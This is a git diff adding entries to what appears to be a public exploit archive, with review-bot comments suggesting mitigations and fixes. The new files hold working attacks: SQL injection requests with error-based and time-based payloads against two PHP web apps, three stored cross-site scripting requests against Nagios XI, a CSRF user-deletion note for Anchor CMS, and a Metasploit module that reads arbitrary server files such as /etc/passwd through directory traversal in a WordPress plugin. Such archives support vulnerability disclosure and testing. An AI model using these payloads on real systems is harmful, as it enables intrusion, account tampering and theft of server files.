diff --git a/exploits/multiple/webapps/49451.html b/exploits/multiple/webapps/49451.html
new file mode 100644
index 000000000..f4a072e9c
--- /dev/null
+++ b/exploits/multiple/webapps/49451.html
@@ -0,0 +1,19 @@
+# Exploit Title: Anchor CMS 0.12.7 - CSRF (Delete user)
+# Exploit Author: Ninad Mishra
+# Vendor Homepage: https://anchorcms.com/
+# Software Link: https://anchorcms.com/download
+# Version: 0.12.7
+# CVE : CVE-2020-23342
+
+
+###PoC
+the cms uses get method to perform sensitive actions hence users can be deleted via exploit.html
+
+================================
+
+================================
+Where (21) is the user id .
+
+When admin clicks on exploit.html link
+
+User with id 21 will be deleted
\ No newline at end of file
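Review bot: The write-up never names the affected route or a fix: the line under `###PoC` says only that sensitive actions are performed via GET, and the block between the two `====` separators is empty, so a reader cannot tell which admin endpoint to audit or how to confirm a patched install. I would add a header line such as `# Mitigation: accept user deletion only via POST with a per-session anti-CSRF token`, and state whether a fixed release exists (not visible from this entry). The file is also saved as `.html` but holds only `#`-prefixed notes and prose, so the extension is misleading for anyone indexing by type.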
diff --git a/exploits/php/webapps/49447.txt b/exploits/php/webapps/49447.txt
new file mode 100644
index 000000000..1f82d31fe
--- /dev/null
+++ b/exploits/php/webapps/49447.txt
@@ -0,0 +1,50 @@
+# Exploit Title: Online Documents Sharing Platform 1.0 - 'user' SQL Injection
+# Date: 21.01.2021
+# Exploit Author: CANKAT ÇAKMAK
+# Vendor Homepage: https://www.sourcecodester.com/php/14653/online-documents-sharing-platform-php-full-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/notes.zip
+# Version: V1.0
+# Tested on: Windows 10
+
+#Description: The 'user' parameterer is vulnerable to error-based and time-based SQL Injection.
+
+----------------------------------------------------
+
+POST /path/login.php HTTP/1.1
+Host: test.com
+Content-Length: 29
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://test.com
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://test.com/path/login.php
+Accept-Encoding: gzip, deflate
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+
+user=%27&pass=%27&login=login
+
+----------------------------------------------------
+
+#PoC:
+
+Parameter: user (POST)
+ Type: error-based
+ Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
+GROUP BY clause (FLOOR)
+ Payload: user=' AND (SELECT 2047 FROM(SELECT
+COUNT(*),CONCAT(0x7176706a71,(SELECT
+(ELT(2047=2047,1))),0x7162787071,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NRPK&pass='&login=login
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: user=' AND (SELECT 2110 FROM (SELECT(SLEEP(5)))pSYW)--
+HnhM&pass='&login=login
\ No newline at end of file
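Review bot: The `#Description:` line misspells "parameter" as "parameterer" and is the only explanatory text in the entry; it names neither the affected script nor any remediation. I would change it to `# Description: The 'user' parameter of login.php is vulnerable to error-based and time-based SQL injection.` and add `# Mitigation: use prepared statements for the login query and do not return database errors to the client.` The same gap applies to 49448.txt, which has no description line at all and labels its section `poC:` where this file uses `#PoC:`; `Tested on: Windows 10` in both would be more useful with the PHP and MySQL versions, if the author recorded them.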
diff --git a/exploits/php/webapps/49448.txt b/exploits/php/webapps/49448.txt
new file mode 100644
index 000000000..ab5f3a3ef
--- /dev/null
+++ b/exploits/php/webapps/49448.txt
@@ -0,0 +1,42 @@
+# Exploit Title: Apartment Visitors Management System 1.0 - 'email' SQL Injection
+# Date: 20.01.2021
+# Exploit Author: CANKAT ÇAKMAK
+# Vendor Homepage: https://phpgurukul.com/apartment-visitors-management-system-using-php-and-mysql/
+# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10395
+# Version: V1.0
+# Tested on: Windows 10
+
+----------------------------------------------------
+
+POST /avms/forgot-password.php HTTP/1.1
+Host: test.com
+Content-Length: 42
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: test.com
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
+AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88
+Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://test.com/avms/forgot-password.php
+Accept-Encoding: gzip, deflate
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+
+
+email=test%40gmail.com&contactno=1&submit=
+
+----------------------------------------------------
+
+poC:
+
+
+Parameter: email (POST)
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: email=test@gmail.com' AND (SELECT 2600 FROM
+(SELECT(SLEEP(5)))jpeB) AND 'WVFv'='WVFv&contactno=1&submit=
\ No newline at end of file
diff --git a/exploits/php/webapps/49449.txt b/exploits/php/webapps/49449.txt
new file mode 100644
index 000000000..b4c064ad6
--- /dev/null
+++ b/exploits/php/webapps/49449.txt
@@ -0,0 +1,87 @@
+# Exploit Title: Nagios XI 5.7.5 - Multiple Persistent Cross-Site Scripting
+# Date: 1-20-2021
+# Exploit Author: Matthew Aberegg
+# Vendor Homepage: https://www.nagios.com/products/nagios-xi/
+# Vendor Changelog: https://www.nagios.com/downloads/nagios-xi/change-log/
+# Software Link: https://www.nagios.com/downloads/nagios-xi/
+# Version: Nagios XI 5.7.5
+# Tested on: Ubuntu 18.04
+
+
+# Vulnerability Details
+# Description : A persistent cross-site scripting vulnerability exists in the "My Tools" functionality of Nagios XI.
+# Vulnerable Parameter : url
+
+
+# POC
+# Exploit Details : The following request will create a tool with an XSS payload. Click on the URL link for the malicious tool to trigger the payload.
+
+POST /nagiosxi/tools/mytools.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 145
+Origin: http://TARGET
+Connection: close
+Referer: http://TARGET/nagiosxi/tools/mytools.php?edit=1
+Cookie: nagiosxi=5kbmap730ic023ig2q0bpdefas
+Upgrade-Insecure-Requests: 1
+
+nsp=a2569a2507c7c69600769ca7388614b4264ab9479c560ac62bbc5f9fd76c2524&update=1&id=-1&name=XSS+Test&url=%27+onclick%3D%27alert%281%29&updateButton=
+
+
+############################################################################################################
+
+# Vulnerability Details
+# Description : A persistent cross-site scripting vulnerability exists in "Business Process Intelligence" functionality of Nagios XI.
+# Vulnerable Parameter : groupID
+
+
+# POC
+# Exploit Details : The following request will create a BPI group with an XSS payload. Click on the Group ID for the malicious BPI group to trigger the payload.
+
+POST /nagiosxi/includes/components/nagiosbpi/index.php?cmd=add HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 186
+Origin: http://TARGET
+Connection: close
+Referer: http://TARGET/nagiosxi/includes/components/nagiosbpi/index.php?cmd=add&tab=add
+Cookie: nagiosxi=6lg3d4mqgsgsllclli1hch00td
+Upgrade-Insecure-Requests: 1
+
+groupID=%27onclick%3Dalert%281%29%2F%2F&groupType=default&groupTitle=TEST&groupDesc=&groupInfoUrl=&groupPrimary=1&groupWarn=90&groupCrit=80&groupDisplay=2&addSubmitted=true
+
+
+############################################################################################################
+
+# Vulnerability Details
+# Description : A persistent cross-site scripting vulnerability exists in "Views" functionality of Nagios XI.
+# Vulnerable Parameter : url
+
+
+# POC
+# Exploit Details : The following request will create a view with an XSS payload. Click on the malicious view to trigger the payload.
+
+POST /nagiosxi/ajaxhelper.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 147
+Origin: http://TARGET
+Connection: close
+Referer: http://TARGET/nagiosxi/account/
+Cookie: nagiosxi=6lg3d4mqgsgsllclli1hch00td
+
+cmd=addview&url=javascript:alert(1)&title=TESTVIEW&submitButton=&nsp=c97136052a4b8d7d535c7d4a7a32389a5882c65cb34f2c36b849f72af52b2056
\ No newline at end of file
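Review bot: All three captured requests still carry what look like real session material: the `Cookie: nagiosxi=...` header in each request and the `nsp=` token in the first and third bodies. The file already replaces the host with `TARGET`, so these should be placeholders too, e.g. `Cookie: nagiosxi=<SESSION_COOKIE>` and `nsp=<NSP_TOKEN>`. The header also links the vendor changelog but names no fixed release or CVE, so a reader cannot tell from the entry which upgrade resolves the three issues.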
diff --git a/exploits/php/webapps/49450.rb b/exploits/php/webapps/49450.rb
new file mode 100755
index 000000000..2ee36db20
--- /dev/null
+++ b/exploits/php/webapps/49450.rb
@@ -0,0 +1,89 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+ include Msf::Auxiliary::Report
+ include Msf::Exploit::Remote::HTTP::Wordpress
+ include Msf::Auxiliary::Scanner
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Simple JobBoard Authenticated File Read Vulnerability',
+ 'Description' => %q{
+ This module exploits an authenticated directory traversal vulnerability in WordPress plugin 'Simple JobBoard ' < 2.9.3,
+ allowing arbitrary file read with the web server privileges.
+ },
+ 'Author' =>
+ [
+ 'Arcangelo Saracino', # Vulnerability discovery
+ 'Hoa Nguyen - Suncsr Team', # Metasploit module
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ ['CVE', '2020-35749'],
+ ['WPVDB', 'eed3bd69-2faf-4bc9-915c-c36211ef9e2d'],
+ ['URL','https://arkango.github.io/CVE-2020/CVE-2020-35749%20DIr.%20Traversal%20Simple%20Board%20Job%20Wordpress%20plugin.html']
+ ],
+ 'DisclosureDate' => 'Jan 15 2021'))
+
+ register_options([
+ OptString.new('FILEPATH',[true,'The path to the file to read','/etc/passwd']),
+ OptString.new('USERNAME',[true,'The WordPress username to authenticate with']),
+ OptString.new('PASSWORD',[true,'The Wordpress password to authenticate with']),
+ OptInt.new('DEPTH',[true,'Traversal Depth (to reach the root folder',8]),
+ ])
+ end
+
+ def username
+ datastore['USERNAME']
+ end
+
+ def password
+ datastore['PASSWORD']
+ end
+
+ def check
+ cookie = wordpress_login(username,password)
+ if cookie.nil?
+ store_valid_credential(user: username, private: password, proof: cookie)
+ return CheckCode::Safe
+ end
+ CheckCode::Appears
+ end
+
+ def run_host(ip)
+ cookie = wordpress_login(username, password)
+ traversal = '../' * datastore['DEPTH']
+ filename = datastore['FILEPATH']
+ filename = filename[1, filename.length] if filename =~ /^\//
+
+ res = send_request_cgi({
+ 'cookie' => cookie,
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path,'wp-admin',''),
+ 'vars_get' =>
+ {
+ 'post' => 'application_id',
+ 'action' => 'edit',
+ 'sjb_file' => "#{traversal}#{filename}"
+ }
+ })
+
+ fail_with Failure::Unreachable, 'Connection failed' unless res fail_with Failure::NotVulnerable, 'Connection failed. Nothingn was downloaded' if res.code != 200
+ fail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.length.zero?
+ print_good('Downloading file ...')
+ print_line("\n#{res.body}\n")
+ fname = datastore['FILEPATH']
+ path = store_loot(
+ 'Simple_JobBoard.traversal',
+ 'text/plain',
+ ip,
+ res.body,
+ fname
+ )
+ print_good("File save in: #{path}")
+ end
+ end
\ No newline at end of file
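Review bot: In `check`, the `store_valid_credential` call sits inside the `if cookie.nil?` branch, so the credential pair is recorded as valid precisely when the login failed (with `proof: nil`) and nothing is recorded when it succeeds. The same method returns `CheckCode::Appears` after any successful login without looking at the installed plugin version, which will report patched sites as affected. I would return `CheckCode::Unknown` when the cookie is nil and move `store_valid_credential(user: username, private: password, proof: cookie)` after that guard. Separately, the first guard in `run_host` has two `fail_with` statements run together on one line (and "Nothingn" in its message), which should be split and corrected.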
diff --git a/files_exploits.csv b/files_exploits.csv
index fd319346d..92458bfc2 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -25890,6 +25890,7 @@ id,file,description,date,author,type,platform,port
49443,exploits/multiple/webapps/49443.py,"ChurchRota 2.6.4 - RCE (Authenticated)",2021-01-20,"Rob McCarthy",webapps,multiple,
49444,exploits/multiple/webapps/49444.txt,"Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored XSS",2021-01-20,omurugur,webapps,multiple,
49445,exploits/php/webapps/49445.py,"Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution)",2021-01-20,"Richard Jones",webapps,php,
+49447,exploits/php/webapps/49447.txt,"Online Documents Sharing Platform 1.0 - 'user' SQL Injection",2021-01-21,"CANKAT ÇAKMAK",webapps,php,
49433,exploits/php/webapps/49433.txt,"Alumni Management System 1.0 - _Last Name field in Registration page_ Stored XSS",2021-01-15,"Siva Rajendran",webapps,php,
49434,exploits/php/webapps/49434.py,"E-Learning System 1.0 - Authentication Bypass & RCE POC",2021-01-15,"Himanshu Shukla",webapps,php,
49435,exploits/multiple/webapps/49435.rb,"Netsia SEBA+ 0.16.1 - Authentication Bypass and Add Root User (Metasploit)",2021-01-15,AkkuS,webapps,multiple,
@@ -43644,3 +43645,7 @@ id,file,description,date,author,type,platform,port
49436,exploits/hardware/webapps/49436.py,"Cisco UCS Manager 2.2(1d) - Remote Command Execution",2021-01-18,liquidsky,webapps,hardware,
49437,exploits/multiple/webapps/49437.txt,"Xwiki CMS 12.10.2 - Cross Site Scripting (XSS)",2021-01-18,"Karan Keswani",webapps,multiple,
49438,exploits/hardware/webapps/49438.py,"Inteno IOPSYS 3.16.4 - root filesystem access via sambashare (Authenticated)",2021-01-18,"Henrik Pedersen",webapps,hardware,
+49448,exploits/php/webapps/49448.txt,"Apartment Visitors Management System 1.0 - 'email' SQL Injection",2021-01-21,"CANKAT ÇAKMAK",webapps,php,
+49449,exploits/php/webapps/49449.txt,"Nagios XI 5.7.5 - Multiple Persistent Cross-Site Scripting",2021-01-21,"Matthew Aberegg",webapps,php,
+49450,exploits/php/webapps/49450.rb,"Wordpress Plugin Simple Job Board 2.9.3 - Authenticated File Read (Metasploit)",2021-01-21,"SunCSR Team",webapps,php,
+49451,exploits/multiple/webapps/49451.html,"Anchor CMS 0.12.7 - CSRF (Delete user)",2021-01-21,"Ninad Mishra",webapps,multiple,
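Review bot: The new 49450 row gives the affected version as `2.9.3`, while the module's own description in 49450.rb says the flaw is in versions `< 2.9.3`; one of the two is off by a release, and readers use this column to decide whether an install is affected. If the module text is the accurate one, the title should read `Wordpress Plugin Simple Job Board < 2.9.3 - Authenticated File Read (Metasploit)`. The author column for that row (`SunCSR Team`) also differs from the module's `Author` list, which credits a separate person for the vulnerability discovery.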